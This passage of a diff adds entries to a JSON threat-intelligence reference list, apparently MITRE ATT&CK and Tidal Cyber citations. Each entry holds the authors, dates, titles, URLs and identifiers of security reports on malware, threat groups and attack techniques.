Nestori Syynimaa. (2022, September 20). Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2022-09-20T00:00:00Z", + "refs": [ + "https://o365blog.com/post/pta/" + ], + "source": "MITRE", + "title": "Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials" + }, + "related": [], + "uuid": "a0ddb60b-5445-46b3-94c5-b47e76de553d", + "value": "Azure AD PTA Vulnerabilities" + }, + { + "description": "Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.", + "meta": { + "date_accessed": "2022-05-25T00:00:00Z", + "refs": [ + "https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf" + ], + "source": "MITRE", + "title": "Exploiting Smart-Phone USB Connectivity For Fun And Profit" + }, + "related": [], + "uuid": "573796bd-4553-4ae1-884a-9af71b5de873", + "value": "Exploiting Smartphone USB" + }, + { + "description": "VerSprite. (2018, January 24). Exploiting VyprVPN for MacOS. Retrieved April 20, 2022.", + "meta": { + "date_accessed": "2022-04-20T00:00:00Z", + "date_published": "2018-01-24T00:00:00Z", + "refs": [ + "https://versprite.com/blog/exploiting-vyprvpn-for-macos/" + ], + "source": "MITRE", + "title": "Exploiting VyprVPN for MacOS" + }, + "related": [], + "uuid": "5e65d8cc-142b-4724-8a07-8e21558e0f64", + "value": "versprite xpc vpn" + }, + { + "description": "LOLBAS. (2020, June 24). Explorer.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2020-06-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Explorer/" + ], + "source": "Tidal Cyber", + "title": "Explorer.exe" + }, + "related": [], + "uuid": "9ba3d54c-02d1-45bd-bfe8-939e84d9d44b", + "value": "Explorer.exe - LOLBAS Project" + }, + { + "description": "Trend Micro. (2019, January 16). Exploring Emotet's Activities . Retrieved March 25, 2019.", + "meta": { + "date_accessed": "2019-03-25T00:00:00Z", + "date_published": "2019-01-16T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/white_papers/ExploringEmotetsActivities_Final.pdf" + ], + "source": "MITRE", + "title": "Exploring Emotet's Activities" + }, + "related": [], + "uuid": "a81f1dad-5841-4142-80c1-483b240fd67d", + "value": "Trend Micro Emotet Jan 2019" + }, + { + "description": "Borges, E. (2019, March 5). Exploring Google Hacking Techniques. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-03-05T00:00:00Z", + "refs": [ + "https://securitytrails.com/blog/google-hacking-techniques" + ], + "source": "MITRE", + "title": "Exploring Google Hacking Techniques" + }, + "related": [], + "uuid": "3e7fdeaf-24a7-4cb5-8ed3-6057c9035303", + "value": "SecurityTrails Google Hacking" + }, + { + "description": "Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-09-16T00:00:00Z", + "refs": [ + "https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2" + ], + "source": "MITRE", + "title": "Export & Download — SSL Certificate from Server (Site URL)" + }, + "related": [], + "uuid": "6502425f-3435-4162-8c96-9e10a789d362", + "value": "Medium SSL Cert" + }, + { + "description": "Stolyarov, V. (2022, March 17). Exposing initial access broker with ties to Conti. Retrieved August 18, 2022.", + "meta": { + "date_accessed": "2022-08-18T00:00:00Z", + "date_published": "2022-03-17T00:00:00Z", + "refs": [ + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/" + ], + "source": "MITRE", + "title": "Exposing initial access broker with ties to Conti" + }, + "related": [], + "uuid": "19d2cb48-bdb2-41fe-ba24-0769d7bd4d94", + "value": "Google EXOTIC LILY March 2022" + }, + { + "description": "Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.", + "meta": { + "date_accessed": "2022-07-01T00:00:00Z", + "date_published": "2022-06-02T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/" + ], + "source": "MITRE", + "title": "Exposing POLONIUM activity and infrastructure targeting Israeli organizations" + }, + "related": [], + "uuid": "689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd", + "value": "Microsoft POLONIUM June 2022" + }, + { + "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2016-05-14T00:00:00Z", + "refs": [ + "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way" + ], + "source": "MITRE", + "title": "External to DA, the OS X Way" + }, + "related": [], + "uuid": "b714e6a9-5c12-4a3b-89f9-d379c0284f06", + "value": "External to DA, the OS X Way" + }, + { + "description": "LOLBAS. (2018, May 25). Extexport.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extexport/" + ], + "source": "Tidal Cyber", + "title": "Extexport.exe" + }, + "related": [], + "uuid": "2aa09a10-a492-4753-bbd8-aacd31e4fee3", + "value": "Extexport.exe - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). Extrac32.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/" + ], + "source": "Tidal Cyber", + "title": "Extrac32.exe" + }, + "related": [], + "uuid": "ae632afc-336c-488e-81f6-91ffe1829595", + "value": "Extrac32.exe - LOLBAS Project" + }, + { + "description": "Harrell, C. (2012, December 11). Extracting ZeroAccess from NTFS Extended Attributes. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "date_published": "2012-12-11T00:00:00Z", + "refs": [ + "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html" + ], + "source": "MITRE", + "title": "Extracting ZeroAccess from NTFS Extended Attributes" + }, + "related": [], + "uuid": "e9dff187-fe7d-469d-81cb-30ad520dbd3d", + "value": "Journey into IR ZeroAccess NTFS EA" + }, + { + "description": "Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.", + "meta": { + "date_accessed": "2015-09-29T00:00:00Z", + "date_published": "2014-07-11T00:00:00Z", + "refs": [ + "https://airbus-cyber-security.com/the-eye-of-the-tiger/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Eye of the Tiger" + }, + "related": [], + "uuid": "a4617ef4-e6d2-47e7-8f81-68e7380279bf", + "value": "Bizeul 2014" + }, + { + "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2020-10-20T00:00:00Z", + "refs": [ + "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/" + ], + "source": "MITRE", + "title": "Facebook: A Top Launching Pad For Phishing Attacks" + }, + "related": [], + "uuid": "186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7", + "value": "ThreatPost Social Media Phishing" + }, + { + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 29, 2022.", + "meta": { + "date_accessed": "2022-09-29T00:00:00Z", + "date_published": "2021-01-11T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + ], + "source": "MITRE", + "title": "FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts" + }, + "related": [], + "uuid": "34dc9010-e800-420c-ace4-4f426c915d2f", + "value": "SentinelLabs reversing run-only applescripts 2021" + }, + { + "description": "Phil Stokes. (2021, January 11). FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2021-01-11T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/" + ], + "source": "MITRE", + "title": "FADE DEAD | Adventures in Reversing Malicious Run-Only AppleScripts" + }, + "related": [], + "uuid": "785f7692-2be8-4f5d-921e-51efdfe0c0b9", + "value": "Sentinel Labs" + }, + { + "description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.", + "meta": { + "date_accessed": "2019-04-01T00:00:00Z", + "date_published": "2019-03-20T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/" + ], + "source": "MITRE", + "title": "Fake or Fake: Keeping up with OceanLotus decoys" + }, + "related": [], + "uuid": "b2745f5c-a181-48e1-b1cf-37a1ffe1fdf0", + "value": "ESET OceanLotus Mar 2019" + }, + { + "description": "ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.", + "meta": { + "date_accessed": "2023-03-08T00:00:00Z", + "date_published": "2020-02-11T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials" + ], + "source": "MITRE", + "title": "Fake Sites Stealing Steam Credentials" + }, + "related": [], + "uuid": "c2f01a3b-a164-59b7-be5d-5eec4eb69ee5", + "value": "ZScaler BitB 2020" + }, + { + "description": "FalconFeedsio. (2023, October 9). FalconFeedsio Tweet October 9 2023. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-10-09T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/FalconFeedsio/status/1711251161289003465" + ], + "source": "Tidal Cyber", + "title": "FalconFeedsio Tweet October 9 2023" + }, + "related": [], + "uuid": "e9810a28-f060-468b-b4ea-ffed9403ae8b", + "value": "FalconFeedsio Tweet October 9 2023" + }, + { + "description": "FalconFeedsio. (2023, September 28). FalconFeedsio Tweet September 28 2023. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-09-28T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/FalconFeedsio/status/1707330146842169831" + ], + "source": "Tidal Cyber", + "title": "FalconFeedsio Tweet September 28 2023" + }, + "related": [], + "uuid": "78128031-bcbb-42c2-8bed-4613a10a02ca", + "value": "FalconFeedsio Tweet September 28 2023" + }, + { + "description": "Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.", + "meta": { + "date_accessed": "2022-05-05T00:00:00Z", + "date_published": "2022-03-23T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/" + ], + "source": "MITRE", + "title": "Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack" + }, + "related": [], + "uuid": "9d0ff77c-09e9-4d58-86f4-e2398f298ca9", + "value": "falconoverwatch_blackcat_attack" + }, + { + "description": "Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019.", + "meta": { + "date_accessed": "2019-06-17T00:00:00Z", + "date_published": "2018-08-08T00:00:00Z", + "refs": [ + "https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/" + ], + "source": "MITRE", + "title": "Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces" + }, + "related": [], + "uuid": "5c662775-9703-4d01-844b-40a0e5c24fb9", + "value": "CitizenLab Tropic Trooper Aug 2018" + }, + { + "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2020-08-26T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa20-239a" + ], + "source": "MITRE, Tidal Cyber", + "title": "FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks" + }, + "related": [], + "uuid": "a8a2e3f2-3967-4e82-a36a-2436c654fb3f", + "value": "CISA AA20-239A BeagleBoyz August 2020" + }, + { + "description": "Albors, Josep. (2017, January 12). Fast Flux networks: What are they and how do they work?. Retrieved March 11, 2020.", + "meta": { + "date_accessed": "2020-03-11T00:00:00Z", + "date_published": "2017-01-12T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/" + ], + "source": "MITRE", + "title": "Fast Flux networks: What are they and how do they work?" + }, + "related": [], + "uuid": "e232d739-663e-4878-b13b-9248cd81e657", + "value": "Fast Flux - Welivesecurity" + }, + { + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2014-12-17T00:00:00Z", + "refs": [ + "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref" + ], + "source": "MITRE", + "title": "Fast Flux Networks Working and Detection, Part 1" + }, + "related": [], + "uuid": "5f169cae-6b59-4879-9a8f-93fdcea5cc58", + "value": "MehtaFastFluxPt1" + }, + { + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", + "meta": { + "date_accessed": "2017-03-06T00:00:00Z", + "date_published": "2014-12-23T00:00:00Z", + "refs": [ + "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + ], + "source": "MITRE", + "title": "Fast Flux Networks Working and Detection, Part 2" + }, + "related": [], + "uuid": "f8a98e55-c91e-4b5e-b6f3-0065ef07375d", + "value": "MehtaFastFluxPt2" + }, + { + "description": "FBI. (2022). FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud. Retrieved August 18, 2023.", + "meta": { + "date_accessed": "2023-08-18T00:00:00Z", + "date_published": "2022-01-01T00:00:00Z", + "refs": [ + "https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view" + ], + "source": "MITRE", + "title": "FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud" + }, + "related": [], + "uuid": "3388bfec-7822-56dc-a384-95aa79f42fe8", + "value": "FBI-BEC" + }, + { + "description": "The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.", + "meta": { + "date_accessed": "2022-01-14T00:00:00Z", + "date_published": "2022-01-07T00:00:00Z", + "refs": [ + "https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/" + ], + "source": "MITRE", + "title": "FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware" + }, + "related": [], + "uuid": "42dc957c-007b-4f90-88c6-1afd6d1032e8", + "value": "FBI Flash FIN7 USB" + }, + { + "description": "FBI National Press Office. (2023, September 6). FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com. Retrieved September 13, 2023.", + "meta": { + "date_accessed": "2023-09-13T00:00:00Z", + "date_published": "2023-09-06T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom" + ], + "source": "Tidal Cyber", + "title": "FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com" + }, + "related": [], + "uuid": "d753c01c-c0f6-4382-ae79-5605a28c94d5", + "value": "FBI Lazarus Stake.com Theft Attribution September 2023" + }, + { + "description": "Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2009-01-08T00:00:00Z", + "refs": [ + "http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin" + ], + "source": "MITRE", + "title": "FDump - Dumping File Sectors Directly from Disk using Logical Offsets" + }, + "related": [], + "uuid": "d92f6dc0-e902-4a4a-9083-8d1667a7003e", + "value": "Hakobyan 2009" + }, + { + "description": "Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "refs": [ + "https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction" + ], + "source": "MITRE", + "title": "Federating Google Cloud with Active Directory" + }, + "related": [], + "uuid": "4e17ca9b-5c98-409b-9496-7c37fe9ee837", + "value": "Google Federating GC" + }, + { + "description": "GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.", + "meta": { + "date_accessed": "2021-09-22T00:00:00Z", + "date_published": "2021-06-16T00:00:00Z", + "refs": [ + "https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Ferocious Kitten: 6 Years of Covert Surveillance in Iran" + }, + "related": [], + "uuid": "b8f8020d-3f5c-4b5e-8761-6ecdd63fcd50", + "value": "Kaspersky Ferocious Kitten Jun 2021" + }, + { + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.", + "meta": { + "date_accessed": "2019-06-04T00:00:00Z", + "date_published": "2013-06-28T00:00:00Z", + "refs": [ + "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf" + ], + "source": "MITRE", + "title": "Fidelis Threat Advisory #1009: \"njRAT\" Uncovered" + }, + "related": [], + "uuid": "6c985470-a923-48fd-82c9-9128b6d59bcb", + "value": "Fidelis njRAT June 2013" + }, + { + "description": "Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.", + "meta": { + "date_accessed": "2016-03-24T00:00:00Z", + "date_published": "2015-12-16T00:00:00Z", + "refs": [ + "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf" + ], + "source": "MITRE", + "title": "Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign" + }, + "related": [], + "uuid": "9d9c0c71-d5a2-41e4-aa90-d1046e0742c7", + "value": "Fidelis INOCNATION" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2017, February 8). Fileless attacks against enterprise networks. Retrieved February 8, 2017.", + "meta": { + "date_accessed": "2017-02-08T00:00:00Z", + "date_published": "2017-02-08T00:00:00Z", + "refs": [ + "https://securelist.com/fileless-attacks-against-enterprise-networks/77403/" + ], + "source": "MITRE", + "title": "Fileless attacks against enterprise networks" + }, + "related": [], + "uuid": "b58d9c32-89c5-449a-88e7-1c7dd3f8380e", + "value": "Securelist fileless attacks Feb 2017" + }, + { + "description": "Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.", + "meta": { + "date_accessed": "2017-12-05T00:00:00Z", + "date_published": "2016-03-23T00:00:00Z", + "refs": [ + "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/" + ], + "source": "MITRE", + "title": "Fileless Malware – A Behavioural Analysis Of Kovter Persistence" + }, + "related": [], + "uuid": "a8420828-9e00-45a1-90d7-a37f898204f9", + "value": "Airbus Security Kovter Analysis" + }, + { + "description": "Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023.", + "meta": { + "date_accessed": "2023-03-23T00:00:00Z", + "date_published": "2023-02-06T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats" + ], + "source": "MITRE", + "title": "Fileless threats" + }, + "related": [], + "uuid": "263fc1ab-f928-583f-986d-1e1bae9b3c85", + "value": "Microsoft Fileless" + }, + { + "description": "Nelson, M. (2016, August 15). \"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.", + "meta": { + "date_accessed": "2016-12-27T00:00:00Z", + "date_published": "2016-08-15T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/" + ], + "source": "MITRE", + "title": "\"Fileless\" UAC Bypass using eventvwr.exe and Registry Hijacking" + }, + "related": [], + "uuid": "74b16ca4-9494-4f10-97c5-103a8521818f", + "value": "enigma0x3 Fileless UAC Bypass" + }, + { + "description": "Nelson, M. (2017, March 17). \"Fileless\" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.", + "meta": { + "date_accessed": "2017-05-25T00:00:00Z", + "date_published": "2017-03-17T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" + ], + "source": "MITRE", + "title": "\"Fileless\" UAC Bypass Using sdclt.exe" + }, + "related": [], + "uuid": "5e5597e2-ea05-41e0-8752-ca95a89a5aa3", + "value": "enigma0x3 sdclt bypass" + }, + { + "description": "Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2018-05-31T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management" + ], + "source": "MITRE", + "title": "File Management (Local File Systems)" + }, + "related": [], + "uuid": "e6d84416-5808-4e7d-891b-ba67dada8726", + "value": "Microsoft File Mgmt" + }, + { + "description": "Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.", + "meta": { + "date_accessed": "2014-12-02T00:00:00Z", + "refs": [ + "http://msdn.microsoft.com/en-us/library/aa364404" + ], + "source": "MITRE", + "title": "File Streams" + }, + "related": [], + "uuid": "ef3f58da-e735-4b1d-914c-fafabb7439bf", + "value": "Microsoft File Streams" + }, + { + "description": "YesWeRHackers. (2021, June 16). File Upload Attacks (Part 2). Retrieved August 23, 2022.", + "meta": { + "date_accessed": "2022-08-23T00:00:00Z", + "date_published": "2021-06-16T00:00:00Z", + "refs": [ + "https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/" + ], + "source": "MITRE", + "title": "File Upload Attacks (Part 2)" + }, + "related": [], + "uuid": "4f7c7d6c-ad56-594f-bcb8-79523f436f2c", + "value": "file_upload_attacks_pt2" + }, + { + "description": "Microsoft. (2018, May 30). Filtering the Scope of a GPO. Retrieved March 13, 2019.", + "meta": { + "date_accessed": "2019-03-13T00:00:00Z", + "date_published": "2018-05-30T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-gpo" + ], + "source": "MITRE", + "title": "Filtering the Scope of a GPO" + }, + "related": [], + "uuid": "327caed7-a53f-4245-8774-a9f170932012", + "value": "Microsoft GPO Security Filtering" + }, + { + "description": "FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.", + "meta": { + "date_accessed": "2017-06-25T00:00:00Z", + "date_published": "2017-06-16T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "FIN10: Anatomy of a Cyber Extortion Operation" + }, + "related": [], + "uuid": "9d5c3956-7169-48d5-b4d0-f7a56a742adf", + "value": "FireEye FIN10 June 2017" + }, + { + "description": "Joshua Shilko, Zach Riddle, Jennifer Brooks, Genevieve Stark, Adam Brunner, Kimberly Goody, Jeremy Kennelly. (2021, October 7). FIN12 Group Profile. Retrieved September 22, 2023.", + "meta": { + "date_accessed": "2023-09-22T00:00:00Z", + "date_published": "2021-10-07T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf" + ], + "source": "Tidal Cyber", + "title": "FIN12 Group Profile" + }, + "related": [], + "uuid": "7af84b3d-bbd6-449f-b29b-2f14591c9f05", + "value": "Mandiant FIN12 Group Profile October 07 2021" + }, + { + "description": "Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.", + "meta": { + "date_accessed": "2023-06-15T00:00:00Z", + "date_published": "2021-10-07T00:00:00Z", + "refs": [ + "https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf" + ], + "source": "MITRE", + "title": "FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets" + }, + "related": [], + "uuid": "4514d7cc-b999-5711-a398-d90e5d3570f2", + "value": "Mandiant FIN12 Oct 2021" + }, + { + "description": "CERT-FR. (2023, September 18). FIN12: Un Groupe Cybercriminel aux Multiples Rançongiciel. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "date_published": "2023-09-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf" + ], + "source": "Tidal Cyber", + "title": "FIN12: Un Groupe Cybercriminel aux Multiples Rançongiciel" + }, + "related": [], + "uuid": "0f4a03c5-79b3-418e-a77d-305d5a32caca", + "value": "CERTFR-2023-CTI-007" + }, + { + "description": "Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.", + "meta": { + "date_accessed": "2023-02-09T00:00:00Z", + "date_published": "2022-08-08T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico" + ], + "source": "MITRE", + "title": "FIN13: A Cybercriminal Threat Actor Focused on Mexico" + }, + "related": [], + "uuid": "ebd9d479-1954-5a4a-b7f0-d5372489733c", + "value": "Mandiant FIN13 Aug 2022" + }, + { + "description": "Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.", + "meta": { + "date_accessed": "2018-12-17T00:00:00Z", + "date_published": "2014-11-30T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html" + ], + "source": "MITRE", + "title": "FIN4: Stealing Insider Information for an Advantage in Stock Trading?" + }, + "related": [], + "uuid": "b27f1040-46e5-411a-b238-0b40f6160680", + "value": "FireEye FIN4 Stealing Insider NOV 2014" + }, + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "meta": { + "date_accessed": "2019-09-16T00:00:00Z", + "date_published": "2019-02-01T00:00:00Z", + "refs": [ + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" + ], + "source": "MITRE", + "title": "FIN6 Cybercrime Group Expands Threat to eCommerce Merchants" + }, + "related": [], + "uuid": "9e9e8811-1d8e-4400-8688-e634f859c4e0", + "value": "Visa FIN6 Feb 2019" + }, + { + "description": "Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.", + "meta": { + "date_accessed": "2020-09-08T00:00:00Z", + "date_published": "2019-09-19T00:00:00Z", + "refs": [ + "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/" + ], + "source": "MITRE", + "title": "FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals" + }, + "related": [], + "uuid": "054d7827-3d0c-40a7-b2a0-1428ad7729ea", + "value": "SentinelOne FrameworkPOS September 2019" + }, + { + "description": "Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.", + "meta": { + "date_accessed": "2019-10-11T00:00:00Z", + "date_published": "2019-05-08T00:00:00Z", + "refs": [ + "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/" + ], + "source": "MITRE", + "title": "FIN7.5: the infamous cybercrime rig “FIN7” continues its activities" + }, + "related": [], + "uuid": "42e196e4-42a7-427d-a69b-d78fa6375f8c", + "value": "SecureList Griffon May 2019" + }, + { + "description": "Seals, T. (2021, May 14). FIN7 Backdoor Masquerades as Ethical Hacking Tool. Retrieved February 2, 2022.", + "meta": { + "date_accessed": "2022-02-02T00:00:00Z", + "date_published": "2021-05-14T00:00:00Z", + "refs": [ + "https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/" + ], + "source": "MITRE", + "title": "FIN7 Backdoor Masquerades as Ethical Hacking Tool" + }, + "related": [], + "uuid": "1b89f62f-586d-4dee-b6dd-e5a5cd090a0e", + "value": "Threatpost Lizar May 2021" + }, + { + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "meta": { + "date_accessed": "2017-04-24T00:00:00Z", + "date_published": "2017-04-24T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + ], + "source": "MITRE", + "title": "FIN7 Evolution and the Phishing LNK" + }, + "related": [], + "uuid": 